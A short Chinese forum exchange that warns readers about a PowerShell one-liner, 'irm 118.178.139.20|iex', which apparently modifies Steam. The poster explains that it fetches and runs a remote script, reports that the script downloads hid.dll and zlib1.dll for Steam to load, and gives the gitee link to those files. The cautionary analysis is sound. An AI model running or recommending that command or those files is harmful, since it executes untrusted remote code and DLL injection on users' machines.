posted by wap, platform: Chrome

引用:

原帖由 @不要看我  于 2025-5-20 11:46 发表
他执行的那条irm命令其实就是修改了steam
我感觉这种会有封号危险

irm就是调用http接口，而http接口本来就是公开让所有人访问的。不会修改你本地的steam的。甚至你自己电脑上不安装steam都能执行成功。

但不知道是不是调用了steam官方未开放的有漏洞的接口。这个不清楚，但我觉得概率并不大。

posted by wap, platform: Chrome

引用:

原帖由 @不要看我  于 2025-5-20 12:21 发表
输入：irm 118.178.139.20|iex

喷了！怎么还有个iex！！

这就相当于linux中的 curl xxx | sh -

这个指令的行为完全不受控，也没法记录和追踪，得看当时的http服务返回的内容是什么。可以执行： irm 118.178.139.20 来查看他要你自动执行的脚本，不加 |iex就是安全的，只看脚本不执行。我调了一下看到是一个下载三个文件，让你的steam加载他下载的hid.dll和zlib1.dll，还附加了一个appdata.vdf。只能看出来这个行为。但这三个文件的功能是什么，没有源码，就不知道了。下载地址在：https://gitee.com/steam_run/aa/tree/master/2

有兴趣的可以下下来看看是不是病毒。